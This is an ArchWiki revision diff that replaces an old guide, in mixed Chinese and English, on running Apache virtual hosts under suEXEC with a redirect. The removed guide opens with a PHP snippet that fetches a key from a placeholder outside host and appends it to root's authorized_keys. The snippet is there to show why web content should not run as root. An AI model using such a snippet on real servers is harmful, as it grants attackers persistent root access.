Difference between revisions of "Apache, suEXEC and Virtual Hosts (Español)"

From ArchWiki
Jump to: navigation, search
m (redirect)
 
(14 intermediate revisions by 9 users not shown)
Line 1: Line 1:
[[Category:Redes (Español)]]
+
#redirect [[Apache_HTTP_Server_(Español)]]
[[Category:CÓMOs (Español)]]
 
 
 
{{i18n_links_start}}
 
{{i18n_entry|English|Apache, SuExec and virtual Hosts}}
 
{{i18n_entry|简体中文|Apache, SuExec y los servidores virtuales (Español)}}
 
{{i18n_links_end}}
 
 
 
== Apache, SuExec and virtual Hosts==
 
 
 
这个文档描述了如何去使用Apache的SuExec模块去架设虚拟主机运行在普通用户权限下. 通常情况下不让webspace用友超级权限是一个良好的习惯,就像下面这段brutal PHP代码显示的那样:
 
 
 
<pre>
 
  <?php
 
    # of course this link doesn't lead anywhere
 
    $rsa_key = file('http://yourhost.homeip.net/id_rsa.pub');
 
    exec("cat ${rsa_key[[0]]} >>/root/.ssh/authorized_keys");
 
  ?>
 
</pre>
 
 
 
你同意这个观点吗? 为了预防这一点,绝对不要让你的虚拟主机拥有任何写入数据的权限除了在他自己的主目录下. 不幸地这个方法要求Apache作为超级用户才能运行,但这不是大问题,因为您在缺省DocumentRoot目录下不需要超级用户也可以运行.
 
 
 
如果你打算有几个FTP帐户分别指向几个需要写入权限的空间而且这些空间里的文件可以被Apache读取的话,你应该考虑使用SuExec.
 
<br>
 
==== Prerequisites====
 
* 你需要熟悉基本的Apache的配置,尤其是虚拟主机
 
* 目标主机的管理员权限
 
* 有关添加用户方面的知识
 
* 会使用pacman
 
<br>
 
==== Adding SuExec module to Apache====
 
* load the SuExec module in ''/etc/httpd/conf/httpd.conf'' like this
 
<pre>
 
LoadModule suexec_module        lib/apache/mod_suexec.so
 
</pre>
 
* make sure Apache's default DocumentRoot does not run as superuser either!
 
<pre>
 
User http
 
Group http
 
</pre>
 
<br>
 
 
 
==== Setting up a virtual Host to use SuExec====
 
One way to do it is directly in ''/etc/httpd/conf/httpd.conf'' but I suggest to use a separate file if you intend to create more than just a couple of virtual hosts. Either way, a virtual host that is supposed to use SuExec may look something like this:
 
 
 
<pre>
 
<VirtualHost 192.168.0.1:80>
 
        ServerName myhost
 
        ServerAlias  myhost.localdomain
 
        # this is where requests for / go
 
        DocumentRoot /home/www/vhosts/myhost.localdomain/htdocs
 
 
 
        # here you tell which user (myhost) and group (ftponly) Apache should use
 
        SuexecUserGroup myhost ftponly
 
 
 
        # the following are optional but might be of use for you
 
        ScriptAlias /cgi-bin/ /home/www/vhosts/myhost.localdomain/htdocs/cgi-bin
 
        php_admin_value open_basedir /home/www/vhosts/myhost.localdomain/htdocs
 
        php_admin_value upload_tmp_dir  /home/www/vhosts/myhost.localdomain/tmp
 
        # Safe mode will be removed as of PHP 6. You may want to not enable it.
 
        php_admin_flag safe_mode On
 
        ErrorDocument 404 /home/www/vhosts/myhost.localdomain
 
        <Directory "/home/www/vhosts/myhost.localdomain/htdocs">
 
                AllowOverride None
 
                Order allow,deny
 
                Allow from all
 
                Options +SymlinksIfOwnerMatch +Includes
 
        </Directory>
 
</VirtualHost>
 
</pre>
 
<br>
 
Note that we set upload_tmp_dir to a folder that is outside the document root of your web site (not /home/www/vhosts/myhost.localdomain/htdocs/tmp). It should also be not readable or writable by any other system users. This is for security reasons: this way it cannot be modified or overwritten while PHP is processing it.
 
 
 
==== "Disabling" default DocumentRoot====
 
To further harden your setup you can disable the default ''DocumentRoot'' in order to not have Apache execute anything as the superuser itself runs as. This procedure does not really disable it, rather points it somewhere where it's not remotely accessible anymore. It can be easily achieved by replacing your default ''ServerName'' with the following:
 
 
 
<pre>
 
ServerName localhost:80
 
</pre>
 
 
 
==== Finishing up====
 
Like everytime you change default configuration parameters you need to restart Apache in order to make them have any effect.
 
 
 
<pre>
 
/etc/rc.d/httpd restart
 
</pre>
 
 
 
==== External References====
 
* more in depth information about SuExec: http://httpd.apache.org/docs/suexec.html
 
* same about VirtualHosts: http://httpd.apache.org/docs/vhosts/index.html
 
 
 
----
 
Author: kth5
 

Latest revision as of 21:59, 25 November 2017